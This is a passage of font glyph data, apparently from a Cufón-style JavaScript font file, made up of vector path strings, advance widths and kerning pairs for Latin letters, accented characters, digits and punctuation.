6xm57,-54r42,-91v-32,-11,-45,1,-44,59v0,14,1,23,2,32xm110,-120r-42,89v33,9,43,0,43,-60v0,-10,0,-17,-1,-29","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm28,-219v33,-42,43,-21,83,-12v8,0,12,-7,17,-13r16,12v-26,42,-50,23,-84,14v-6,0,-10,3,-16,11","w":171},{"d":"23,-143r0,-97r56,0v36,0,111,0,111,119v0,45,-11,85,-38,104v-40,28,-76,14,-129,17r0,-102r-21,0r0,-41r21,0xm75,-199r0,56r36,0r0,41r-36,0r0,61v34,0,60,4,60,-81v0,-80,-27,-77,-60,-77","w":202,"k":{"V":4,"Y":14,"\u00dd":14,",":18,".":18,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"W":4}},{"d":"91,-39v25,0,30,-25,30,-39v0,-13,-4,-39,-31,-39v-18,0,-23,12,-26,19r-41,-8r8,-134r128,0r-5,47r-85,0r-2,54v17,-21,62,-34,92,6v13,19,13,46,13,52v0,22,-6,55,-37,74v-51,31,-125,-8,-123,-57r48,-8v2,12,5,33,31,33"},{"d":"18,-177r50,0r0,177r-50,0r0,-177xm33,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm93,-223v-2,26,-40,25,-41,0v0,-11,9,-19,20,-19v11,0,21,8,21,19","w":85},{"d":"100,-240v-45,71,-47,228,0,300r-38,0v-59,-88,-59,-212,0,-300r38,0","w":122},{"d":"22,-53r49,0r0,48r-30,62r-19,0r23,-57r-23,0r0,-53xm22,-177r49,0r0,53r-49,0r0,-53","w":91},{"d":"16,-177r49,0r0,114v0,18,0,28,17,28v22,0,22,-14,22,-52r0,-90r49,0r0,177r-46,0r0,-24v-9,15,-17,28,-46,28v-45,0,-45,-34,-45,-66r0,-115xm99,-211r-14,14r-65,-40r20,-30","w":171},{"d":"18,-177r50,0r0,177r-50,0r0,-177xm67,-211r-14,14r-65,-40r20,-30","w":85},{"d":"16,-177r49,0r0,114v0,18,0,28,17,28v22,0,22,-14,22,-52r0,-90r49,0r0,177r-46,0r0,-24v-9,15,-17,28,-46,28v-45,0,-45,-34,-45,-66r0,-115xm69,-211r60,-56r19,30r-64,40","w":171},{"d":"18,-177r47,0r0,24v9,-27,56,-45,84,-10v15,42,4,110,7,163r-49,0r0,-117v0,-16,-2,-26,-17,-26v-22,0,-22,17,-22,39r0,104r-50,0r0,-177xm28,-219v33,-42,43,-21,83,-12v8,0,12,-7,17,-13r16,12v-26,42,-50,23,-84,14v-6,0,-10,3,-16,11","w":171,"k":{"v":4,"y":7,"\u00fd":7,"\u00ff":7}},{"d":"135,-135r-35,10v3,-18,-41,-36,-41,-8v0,14,9,17,29,24v25,9,53,19,53,55v0,26,-19,58,-68,58v-58,0,-64,-40,-66,-53r39,-7v1,7,6,27,28,27v5,0,20,-2,20,-17v0,-14,-10,-17,-28,-23v-19,-6,-54,-18,-54,-56v-1,-72,114,-73,123,-10","w":147,"k":{"w":7}},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm84,-282v0,26,-40,25,-42,0v0,-12,10,-20,21,-20v11,0,21,8,21,20xm145,-282v-2,26,-42,26,-42,0v0,-12,10,-20,21,-20v11,0,21,8,21,20","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"41,-195r-35,-7v8,-27,24,-40,54,-40v54,0,60,60,25,70v52,21,24,78,-27,78v-48,0,-53,-34,-55,-46r35,-5v1,9,3,21,18,21v10,0,15,-7,15,-16v0,-19,-16,-17,-33,-17r0,-27v15,-1,29,5,31,-15v0,-8,-3,-14,-13,-14v-12,0,-14,12,-15,18","w":122},{"d":"186,-240v-8,104,36,244,-81,244v-82,0,-82,-56,-82,-107r0,-137r52,0r0,137v0,35,0,64,34,64v35,0,31,-19,32,-64r0,-137r45,0xm75,-277r74,-39r12,34r-75,24","w":208,"k":{",":18,".":18,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58xm12,-199r71,-55r70,55r-38,0r-32,-21r-32,21r-39,0","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"65,-240r53,0r68,240r-53,0r-12,-49r-68,0r-12,49r-48,0xm63,-91r48,0r-24,-98xm27,-275v32,-41,45,-23,88,-13v8,0,13,-6,18,-13r16,12v-20,35,-50,30,-88,15v-7,0,-10,3,-18,11","k":{"y":5,"\u00fd":5,"\u00ff":5,"C":7,"\u00c7":7,"G":7,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"Q":7,"T":14,"U":7,"\u00da":7,"\u00db":7,"\u00dc":7,"\u00d9":7,"V":7,"Y":14,"\u00dd":14}},{"d":"-2,-177r54,0r19,41r23,-41r42,0r-45,78r53,99r-54,0r-26,-53r-30,53r-43,0r53,-91","w":135},{"d":"62,-89v0,47,6,58,21,58v14,0,21,-10,21,-58v0,-45,-7,-58,-22,-58v-16,0,-20,14,-20,58xm84,4v-55,-5,-74,-27,-74,-93v0,-83,46,-92,61,-92v12,0,18,4,23,8v-8,-19,-11,-26,-14,-31r-39,19r-12,-25r38,-18v-1,-2,-4,-6,-9,-15r35,-17v3,5,6,11,9,16r42,-20r12,24r-41,19v22,41,40,85,40,135v0,35,-16,95,-71,90","w":165},{"d":"18,-177r50,0r0,177r-50,0r0,-177xm26,-211r59,-56r20,30r-65,40","w":85},{"d":"83,-181v53,0,72,37,72,92v0,57,-21,93,-73,93v-51,0,-72,-36,-72,-93v0,-55,20,-92,73,-92xm104,-89v0,-47,-5,-58,-22,-58v-16,0,-20,14,-20,58v0,47,6,58,21,58v14,0,21,-10,21,-58xm73,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm132,-223v-2,26,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19","w":165,"k":{"y":4,"\u00fd":4,"\u00ff":4}},{"d":"85,-35v21,2,19,-30,19,-52r0,-90r49,0r0,177r-46,0r0,-24v-3,14,-5,28,-22,28v-17,0,-20,-14,-23,-28r0,84r-46,0r0,-237r49,0r0,90v-1,21,0,56,20,52","w":171},{"d":"23,-240r52,0r0,240r-52,0r0,-240xm-24,-261r73,-53r72,53r-39,0r-33,-18r-34,18r-39,0","w":97},{"d":"21,-240r58,0r62,149r0,-149r41,0r0,240r-47,0r-73,-174r0,174r-41,0r0,-240","w":202},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81xm28,-261r73,-53r73,53r-40,0r-33,-18r-33,18r-40,0","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"151,-112r-46,1v-2,-26,-8,-33,-20,-33v-15,0,-25,12,-25,53v0,27,3,55,24,55v16,0,20,-15,21,-33r46,3v-2,18,-8,70,-70,70v-60,0,-70,-55,-70,-93v0,-48,17,-92,73,-92v35,-7,73,39,67,69","w":159},{"d":"186,-240v-8,104,36,244,-81,244v-82,0,-82,-56,-82,-107r0,-137r52,0r0,137v0,35,0,64,34,64v35,0,31,-19,32,-64r0,-137r45,0xm32,-261r72,-53r73,53r-39,0r-34,-18r-33,18r-39,0","w":208,"k":{",":18,".":18,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},{"d":"16,-177r49,0r0,114v0,18,0,28,17,28v22,0,22,-14,22,-52r0,-90r49,0r0,177r-46,0r0,-24v-9,15,-17,28,-46,28v-45,0,-45,-34,-45,-66r0,-115","w":171},{"d":"22,-53r49,0r0,53r-49,0r0,-53","w":91,"k":{" ":18}},{"d":"21,-240r58,0r62,149r0,-149r41,0r0,240r-47,0r-73,-174r0,174r-41,0r0,-240xm41,-275v32,-42,46,-22,89,-13v8,0,12,-6,17,-13r17,12v-21,35,-51,31,-89,15v-7,0,-10,3,-18,11","w":202},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81xm122,-277r-10,19r-76,-24r12,-34","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"155,-81r-93,0v0,24,0,50,24,50v21,0,24,-18,25,-30r44,3v-4,17,-13,62,-70,62v-77,0,-89,-85,-61,-152v21,-47,102,-37,118,-1v11,25,13,46,13,68xm62,-109r46,0v0,-10,1,-40,-23,-40v-22,0,-23,27,-23,40xm73,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm132,-223v-2,26,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19","w":165,"k":{"g":9}},{"d":"75,0r20,0r-7,18v34,-3,36,21,36,27v0,32,-58,37,-75,18r6,-15v9,5,41,19,41,-2v0,-14,-18,-17,-33,-14","w":165},{"d":"23,-240r52,0r0,240r-52,0r0,-240xm76,-277r-11,19r-75,-24r11,-34","w":97},{"d":"23,-240r145,0r0,41r-93,0r0,56r73,0r0,41r-73,0r0,59r93,0r0,43r-145,0r0,-240xm23,-261r72,-53r73,53r-39,0r-34,-18r-33,18r-39,0","w":171},{"d":"-5,-177r50,0r24,108r23,-108r42,0r-53,180v-8,40,-30,70,-78,57r0,-39v24,3,38,3,43,-24xm55,-223v-1,25,-39,25,-41,0v0,-11,10,-19,21,-19v11,0,20,8,20,19xm114,-223v-2,26,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19","w":128,"k":{",":22,".":22,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11}},{"d":"18,-177r50,0r0,177r-50,0r0,-177xm-28,-199r71,-55r70,55r-38,0r-32,-21r-32,21r-39,0","w":85},{"d":"92,-244v39,0,53,26,53,61v0,42,-17,63,-53,63v-39,0,-53,-26,-53,-61v0,-44,19,-63,53,-63xm92,-221v-11,0,-15,10,-15,39v0,31,5,39,15,39v10,0,15,-8,15,-39v0,-30,-5,-39,-15,-39"},{"d":"92,-244v32,0,57,27,57,58v0,32,-26,57,-57,57v-32,0,-57,-25,-57,-57v0,-32,25,-58,57,-58xm92,-215v-14,0,-25,13,-25,29v0,16,12,28,25,28v14,0,25,-13,25,-28v0,-15,-11,-29,-25,-29"},{"w":91},{"d":"23,-240r52,0r0,240r-52,0r0,-240xm40,-282v-2,26,-39,25,-41,0v0,-12,10,-20,21,-20v11,0,20,8,20,20xm102,-282v-2,26,-42,26,-42,0v0,-12,10,-20,21,-20v11,0,21,8,21,20","w":97},{"d":"112,-139r53,0r0,38r-53,0r0,51r-40,0r0,-51r-54,0r0,-38r54,0r0,-54r40,0r0,54xm165,4r-147,0r0,-38r147,0r0,38"},{"d":"151,-112r-46,1v-2,-26,-8,-33,-20,-33v-15,0,-25,12,-25,53v0,27,4,55,25,55v15,0,19,-15,20,-33r46,2v-6,57,-35,67,-62,71r-5,14v36,-3,35,23,35,27v7,32,-58,36,-75,18r6,-16v9,6,38,20,41,-1v2,-13,-17,-18,-32,-14r10,-29v-45,-7,-58,-47,-58,-92v0,-48,17,-92,73,-92v35,-7,73,39,67,69","w":159},{"d":"186,-240r0,240r-53,0r0,-98r-58,0r0,98r-52,0r0,-240r52,0r0,97r58,0r0,-97r53,0","w":208},{"d":"-10,-240r58,0r34,88r36,-88r51,0r-66,138r0,102r-53,0r0,-102xm68,-277r74,-39r12,34r-76,24","w":159,"k":{"C":11,"\u00c7":11,"O":13,"\u00d8":13,"\u00d3":13,"\u00d4":13,"\u00d6":13,"\u00d2":13,"\u00d5":13,",":36,".":36,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"a":32,"\u00e6":32,"\u00e1":32,"\u00e2":32,"\u00e4":32,"\u00e0":32,"\u00e5":32,"\u00e3":32,"e":32,"\u00e9":32,"\u00ea":32,"\u00eb":32,"\u00e8":32,"i":-7,"\u00ed":-7,"\u00ee":-7,"\u00ef":-7,"\u00ec":-7,"o":32,"\u00f8":32,"\u00f3":32,"\u00f4":32,"\u00f6":32,"\u00f2":32,"\u00f5":32,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13}},{"d":"140,-87r48,3v-4,49,-31,88,-84,88v-73,0,-90,-69,-90,-124v0,-44,11,-124,91,-124v61,0,79,51,82,93r-48,4v-1,-19,-4,-54,-34,-54v-30,0,-36,36,-36,85v0,40,5,77,36,77v28,0,33,-35,35,-48","w":196},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm76,-223v-1,25,-39,25,-40,0v0,-11,9,-19,20,-19v11,0,20,8,20,19xm136,-223v-2,26,-39,24,-41,0v0,-11,10,-19,21,-19v11,0,20,8,20,19","w":171},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm15,-199r71,-55r71,55r-39,0r-32,-21r-32,21r-39,0","w":171},{"d":"186,-240v-8,104,36,244,-81,244v-82,0,-82,-56,-82,-107r0,-137r52,0r0,137v0,35,0,64,34,64v35,0,31,-19,32,-64r0,-137r45,0xm98,-282v0,25,-40,26,-41,0v0,-12,9,-20,20,-20v11,0,21,8,21,20xm159,-282v-2,25,-39,26,-41,0v0,-12,9,-20,20,-20v11,0,21,8,21,20","w":208,"k":{",":18,".":18,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},{"d":"143,-183r24,0r-12,94v0,9,2,13,8,13v14,0,28,-25,28,-61v0,-31,-10,-84,-72,-84v-52,0,-81,44,-81,101v0,50,23,101,85,101v33,0,51,-13,62,-20r10,24v-22,14,-48,22,-74,22v-13,0,-60,-3,-89,-42v-57,-78,-18,-213,87,-213v75,0,101,57,101,108v0,57,-32,91,-62,91v-19,0,-24,-11,-27,-20v-24,40,-68,18,-68,-38v0,-54,50,-105,77,-60xm109,-81v20,0,20,-43,20,-48v0,-10,-3,-24,-13,-24v-14,0,-20,23,-20,45v0,15,3,27,13,27","w":226},{"d":"97,-147r41,0r0,37r-35,0v1,30,-1,46,-27,69v42,0,65,5,78,-36r39,15v-22,96,-102,52,-190,62r0,-41v34,-2,47,10,52,-51v0,-8,0,-13,-1,-18r-28,0r0,-37r22,0v-9,-49,1,-97,63,-97v47,0,56,31,60,46r-38,18v-2,-8,-6,-25,-22,-25v-28,0,-12,36,-14,58"},{"d":"148,-125v77,30,37,142,-44,125r-81,0r0,-240v70,2,159,-20,160,63v0,39,-24,48,-35,52xm73,-201r0,58v27,-1,52,7,56,-30v-5,-37,-29,-26,-56,-28xm73,-104r0,63v33,1,65,2,62,-32v-4,-42,-31,-28,-62,-31","w":202,"k":{"O":11,"\u00d8":11,"\u00d3":11,"\u00d4":11,"\u00d6":11,"\u00d2":11,"\u00d5":11,",":14,".":14}},{"d":"22,-146r49,0r0,53r-49,0r0,-53","w":92},{"d":"112,-139r53,0r0,38r-53,0r0,55r-40,0r0,-55r-54,0r0,-38r54,0r0,-54r40,0r0,54"},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81xm91,-282v0,26,-40,25,-42,0v0,-12,10,-20,21,-20v11,0,21,8,21,20xm152,-282v-2,25,-39,26,-41,0v0,-12,9,-20,20,-20v11,0,21,8,21,20","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"139,-240r34,0r-147,300r-33,0","w":190},{"d":"23,-240r52,0r0,240r-52,0r0,-240","w":97},{"d":"165,-101r-147,0r0,-38r147,0r0,38xm113,-156r-42,0r0,-47r42,0r0,47xm113,-37r-42,0r0,-48r42,0r0,48"},{"d":"22,-53r49,0r0,53r-49,0r0,-53xm22,-177r49,0r0,53r-49,0r0,-53","w":91},{"d":"170,-224r0,53r-99,51r99,51r0,53r-156,-82r0,-45"},{"d":"19,-193r4,-47r143,0r0,40v-24,34,-57,84,-59,200r-57,0v0,-18,1,-56,19,-104v17,-47,39,-74,51,-89r-101,0"},{"d":"57,-242v30,0,48,22,48,62v0,41,-18,62,-48,62v-29,0,-47,-21,-47,-62v0,-40,17,-62,47,-62xm57,-215v-11,0,-13,12,-13,35v0,24,2,36,13,36v11,0,14,-12,14,-36v0,-24,-3,-35,-14,-35xm182,-122v28,0,47,20,47,62v0,41,-18,61,-47,61v-29,0,-47,-20,-47,-61v0,-41,18,-62,47,-62xm182,-96v-11,0,-13,12,-13,36v0,24,3,35,13,35v10,0,13,-11,13,-35v0,-24,-3,-36,-13,-36xm163,-240r27,0r-113,240r-27,0","w":239},{"d":"-5,-240r55,0r37,183r38,-183r46,0r-59,241r-59,-1","w":165,"k":{"\u00f6":13,"\u00f4":13,"\u00e8":13,"\u00eb":13,"\u00ea":13,"\u00e3":18,"\u00e5":18,"\u00e0":18,"\u00e4":18,"\u00e2":18,"G":9,"O":4,"\u00d8":4,"\u00d3":4,"\u00d4":4,"\u00d6":4,"\u00d2":4,"\u00d5":4,",":18,".":18,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"a":18,"\u00e6":18,"\u00e1":18,"e":13,"\u00e9":13,"i":-9,"\u00ed":-9,"\u00ee":-9,"\u00ef":-9,"\u00ec":-9,"o":13,"\u00f8":13,"\u00f3":13,"\u00f2":13,"\u00f5":13,"u":5,"\u00fa":5,"\u00fb":5,"\u00fc":5,"\u00f9":5}},{"d":"107,-128r83,0r0,128r-22,0r-7,-27v-5,8,-20,31,-58,31v-60,0,-89,-54,-89,-120v0,-36,8,-128,94,-128v67,0,77,47,82,82r-47,8v-3,-18,-6,-47,-34,-47v-30,0,-40,33,-40,82v0,43,7,80,42,80v31,0,31,-33,32,-48r-36,0r0,-41","w":208},{"d":"27,-177v-4,-55,24,-79,80,-71r0,39v-24,-4,-37,2,-33,32r31,0r0,38r-31,0r0,139r-47,0r0,-139r-21,0r0,-38r21,0","w":104},{"d":"23,-240r52,0r0,195r78,0r0,45r-130,0r0,-240","w":153,"k":{"y":13,"\u00fd":13,"\u00ff":13,"T":14,"V":23,"Y":18,"\u00dd":18,"W":18}},{"d":"101,-244v76,0,87,74,87,124v0,44,-8,124,-87,124v-77,0,-87,-76,-87,-124v0,-46,9,-124,87,-124xm101,-201v-27,0,-32,29,-32,81v0,51,5,81,32,81v27,0,32,-30,32,-81v0,-50,-5,-81,-32,-81xm32,-275v32,-42,46,-22,89,-13v8,0,12,-6,17,-13r17,12v-21,35,-51,31,-89,15v-7,0,-10,3,-18,11","w":202,"k":{"T":13,"V":9,"Y":13,"\u00dd":13,",":22,".":22,"A":7,"\u00c6":7,"\u00c1":7,"\u00c2":7,"\u00c4":7,"\u00c0":7,"\u00c5":7,"\u00c3":7,"W":5,"J":9,"X":9}},{"d":"-5,-177r50,0r24,108r23,-108r42,0r-53,180v-8,40,-30,70,-78,57r0,-39v24,3,38,3,43,-24xm47,-211r60,-56r20,30r-65,40","w":128,"k":{",":22,".":22,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11}},{"d":"30,-240r63,0r-16,168r-32,0xm37,-53r49,0r0,53r-49,0r0,-53","w":122},{"d":"190,-122v0,70,-37,128,-104,122r-63,0r0,-240r56,0v37,0,111,0,111,118xm75,-199r0,158v34,0,60,2,60,-81v0,-79,-27,-77,-60,-77","w":202,"k":{"V":4,"Y":14,"\u00dd":14,",":18,".":18,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"W":4}},{"d":"48,-172v51,-25,105,-6,105,62v0,29,-2,94,3,110r-45,0v-2,-7,-3,-11,-3,-27v-6,12,-18,31,-49,31v-24,0,-46,-14,-46,-49v0,-49,38,-62,91,-65v0,-18,2,-38,-18,-39v-17,0,-20,14,-21,28r-46,-5v1,-10,3,-33,29,-46xm80,-29v21,0,26,-30,24,-56v-28,4,-40,11,-40,34v0,13,4,22,16,22xm120,-229v0,46,-68,45,-68,0v0,-21,17,-34,34,-34v17,0,34,13,34,34xm73,-229v1,18,25,19,26,0v-1,-18,-25,-19,-26,0","w":171},{"d":"72,-105v-75,-20,-59,-125,6,-130r0,-25r27,0r0,25v44,6,55,37,59,51r-37,16v-5,-13,-12,-32,-34,-32v-17,0,-25,13,-25,24v0,16,10,20,45,33v32,12,58,28,58,68v1,47,-34,65,-66,69r0,32r-27,0r0,-32v-51,-6,-60,-44,-65,-62r42,-11v1,9,6,35,38,35v27,0,30,-18,30,-25v0,-18,-10,-25,-51,-36"},{"d":"169,-207r0,32v-14,-2,-24,-5,-29,15v41,54,-15,102,-74,86v-23,17,-13,26,18,26v62,0,83,9,83,52v0,55,-58,59,-87,59v-15,0,-72,0,-72,-42v0,-22,17,-30,28,-34v-6,-3,-23,-10,-23,-30v0,-22,19,-32,31,-39v-11,-6,-26,-15,-26,-45v-1,-57,67,-62,104,-46v0,-22,17,-40,47,-34xm86,-155v-13,0,-17,9,-17,30v0,11,1,27,17,27v13,0,16,-9,16,-28v0,-22,-6,-29,-16,-29xm105,-4v-22,-1,-57,-13,-56,18v0,13,12,18,39,18v44,0,44,-35,17,-36","w":165,"k":{"y":-7,"\u00fd":-7,"\u00ff":-7,",":-9,".":-5,"a":7,"\u00e6":7,"\u00e1":7,"\u00e2":7,"\u00e4":7,"\u00e0":7,"\u00e5":7,"\u00e3":7,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9,"r":7}},{"d":"66,-240r-6,105r-33,0r-7,-105r46,0xm134,-240r-7,105r-33,0r-7,-105r47,0","w":153},{"d":"10,-47v29,-31,94,-65,99,-124v0,-5,-1,-30,-23,-30v-13,0,-24,7,-28,45r-48,-9v6,-34,21,-79,80,-79v60,0,74,44,74,70v0,50,-41,87,-100,127r103,0r-4,47r-153,0r0,-47"},{"d":"58,-242r30,0r0,117r25,0r0,29r-91,0r0,-29r26,0r0,-72v-11,8,-16,11,-26,16r0,-34v16,-8,26,-15,36,-27","w":122},{"d":"23,-240r52,0r0,100r59,-100r53,0r-60,88r65,152r-54,0r-43,-111r-20,30r0,81r-52,0r0,-240","w":190,"k":{"y":13,"\u00fd":13,"\u00ff":13,"O":11,"\u00d8":11,"\u00d3":11,"\u00d4":11,"\u00d6":11,"\u00d2":11,"\u00d5":11,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9}},{"d":"-3,-177r48,0r21,108r20,-108r48,0r16,108r24,-108r39,0r-45,177r-41,0r-23,-121r-22,121r-40,0","w":208,"k":{",":18,".":18,"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11}},{"d":"2,-240r58,0r29,63r31,-63r50,0r-57,109r64,131r-57,0r-36,-78r-39,78r-50,0r65,-123","w":171},{"d":"92,4v-63,0,-80,-72,-80,-121v0,-90,25,-127,80,-127v62,0,80,74,80,121v0,89,-24,127,-80,127xm92,-205v-31,7,-25,34,-25,85v0,40,-8,81,25,85v30,-7,25,-34,25,-85v0,-44,8,-80,-25,-85"},{"d":"61,-240r31,0r-11,69r36,0r10,-69r32,0r-11,69r32,0r-4,30r-32,0r-6,38r32,0r-4,30r-32,0r-12,73r-31,0r12,-73r-36,0r-11,73r-31,0r11,-73r-32,0r4,-30r32,0r6,-38r-32,0r4,-30r32,0xm113,-141r-36,0r-6,38r36,0"},{"d":"42,-185r-36,-7v3,-14,9,-50,54,-50v42,0,51,29,51,43v0,32,-32,52,-62,70r64,0r-3,33r-104,0r0,-31v56,-43,63,-56,63,-71v0,-6,-2,-14,-11,-14v-10,0,-15,9,-16,27","w":122},{"d":"59,-90v0,-44,-19,-124,-36,-150r39,0v58,88,57,213,0,300r-39,0v16,-25,36,-108,36,-150","w":122},{"d":"15,-55r47,-9v2,11,5,29,25,29v31,0,29,-54,29,-75v-5,7,-15,21,-41,21v-46,0,-65,-42,-65,-76v0,-23,10,-79,76,-79v27,0,48,8,63,34v15,26,17,71,17,86v0,67,-17,128,-81,128v-54,0,-65,-39,-70,-59xm87,-205v-19,0,-26,19,-26,37v0,21,6,37,27,37v22,0,26,-19,26,-37v0,-24,-10,-37,-27,-37"},{"d":"186,-240v-8,104,36,244,-81,244v-82,0,-82,-56,-82,-107r0,-137r52,0r0,137v0,35,0,64,34,64v35,0,31,-19,32,-64r0,-137r45,0","w":208,"k":{",":18,".":18,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},{"d":"13,-177r111,0r0,31r-66,111r68,0r0,35r-119,0r0,-35r65,-107r-59,0r0,-35","w":128},{"d":"18,-240r50,0r0,240r-50,0r0,-240","w":86},{"d":"22,-53r49,0r0,48r-30,62r-19,0r23,-57r-23,0r0,-53","w":91,"k":{" ":18}},{"d":"109,-174v1,-9,-9,-33,-24,-29v-19,0,-25,16,-28,30r-46,-9v14,-49,47,-62,79,-62v40,0,71,21,71,65v0,37,-24,48,-35,53v31,10,40,32,40,57v0,63,-55,73,-79,73v-19,0,-43,-6,-60,-23v-15,-16,-19,-34,-21,-48r47,-8v1,13,4,36,31,36v18,0,28,-13,28,-33v0,-30,-22,-35,-52,-33r0,-39v25,-1,45,7,49,-30"},{"d":"125,-242r0,203r40,0r0,39r-133,0r0,-39r41,0r0,-142v-11,11,-22,20,-41,30r0,-47v28,-15,43,-30,53,-44r40,0"},{"d":"14,-16r0,-53r99,-51r-99,-51r0,-53r156,81r0,45"},{"d":"179,-138r38,8v-8,36,-19,57,-32,77v14,14,19,13,32,12r0,41v-25,9,-53,-5,-64,-20v-14,11,-31,24,-65,24v-74,0,-77,-61,-77,-71v0,-34,22,-55,55,-69v-5,-8,-23,-31,-23,-54v0,-26,24,-54,64,-54v42,0,61,30,61,58v0,35,-28,50,-41,57r33,44v11,-18,16,-40,19,-53xm109,-210v-33,1,-14,44,-3,54v13,-7,22,-18,22,-33v0,-6,-2,-21,-19,-21xm129,-50r-43,-59v-15,9,-25,21,-25,38v0,15,9,35,35,35v18,0,27,-9,33,-14","w":232},{"d":"77,-240r30,0r-4,44r36,-25r15,27r-40,18r40,17r-15,27r-36,-25r4,44r-30,0r4,-44r-36,25r-15,-27r39,-17r-39,-18r15,-27r36,25"},{"d":"23,-240v53,3,107,-14,138,18v33,34,29,92,-5,119v-25,20,-51,13,-81,14r0,89r-52,0r0,-240xm126,-166v0,-44,-24,-34,-51,-35r0,71v30,0,51,4,51,-36","k":{"\u00e4